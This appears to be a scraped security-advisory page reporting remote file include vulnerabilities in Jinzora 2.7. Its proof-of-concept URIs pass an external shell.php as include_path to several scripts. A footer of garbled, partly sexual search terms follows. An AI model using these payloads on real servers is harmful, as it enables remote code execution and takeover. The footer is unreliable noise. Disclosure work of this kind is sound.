about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Jinzora Include_Path Multiple Remote File Include Vulnerabilities


Title Jinzora Include_Path Multiple Remote File Include Vulnerabilities
Published 2006-12-26-12:00AM
Updated 2007-01-02-07:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  nuffsaid is credited with the discovery of these vulnerabilities.
Vulnerable  Jinzora Jinzora 2.7
Not Vulnerable  
Code   Attackers can exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/popup.php?include_path=http://www.example2.com.com/shell.php?
http://www.example.com/rss.php?include_path=http://www.example2.com.com/shell.php?
http://www.example.com/ajax_request.php?include_path=http://www.example2.com.com/shell.php
http://www.example.commediabroadcast.php?include_path=http://www.example2.com.com/shell.php?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 15:13:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Freesexygi www.32500. Womenpho.o paly boy linux kern www.251758 PHP Remote lo151l t443t IceWarp We com_phpsho nayanthara 18girl www.sex98. gypsysexyp power girl femail sex angiliena www .setas ...x/fx29 desipapa s CMS is Fre maxcpm.inf php-nuke 2 guest book www.sex98. Sex vidio. desipapa s named Ww.putas.t fgdcij.jio PHP Advanc jessie56.j local file Joomla! is jessie56.j maxcpm.inf 8pop.5d6d. news for c photo lesb www.hoolyw nxnxx embedded l 7507.900y. www.wangru Bild BulletProo annaba sex Sex Imege hindi stor